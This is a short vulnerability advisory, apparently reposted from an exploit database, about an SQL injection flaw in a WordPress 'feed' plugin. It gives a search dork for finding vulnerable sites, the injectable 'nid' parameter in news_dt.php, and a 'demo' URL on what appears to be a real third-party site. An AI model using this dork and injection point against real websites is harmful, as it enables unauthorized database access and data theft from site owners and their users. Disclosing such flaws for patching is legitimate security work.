WordPress feed plugin Sql Injection

2013-07-08T00:00:00
ID SECURITYVULNS:DOC:29532
Type securityvulns
Reporter Securityvulns
Modified 2013-07-08T00:00:00

Description

The WordPress feed plugin suffers from a Sql Injection vulnerability.

Iranian Exploit DataBase

http://exploit.iedb.ir

Exploit Title : WordPress feed plugin Sql Injection

Author : Iranian Exploit DataBase

Discovered By : IeDb

Email : IeDb.Team@Gmail.com

Home : http://exploit.iedb.ir

Software Link : http://wordpress.org/

Security Risk : High

Tested on : Linux

Dork : inurl:wp-content/plugins/feed/

Exploit :

http://www.Site.com/wp-content/plugins/feed/news_dt.php?nid=[Sql]

Dem0 :

http://easy2remind.com/newsworld/wp-content/plugins/feed/news_dt.php?nid=257[Sql]

Exploit Archive = http://exploit.iedb.ir/exploits-176.html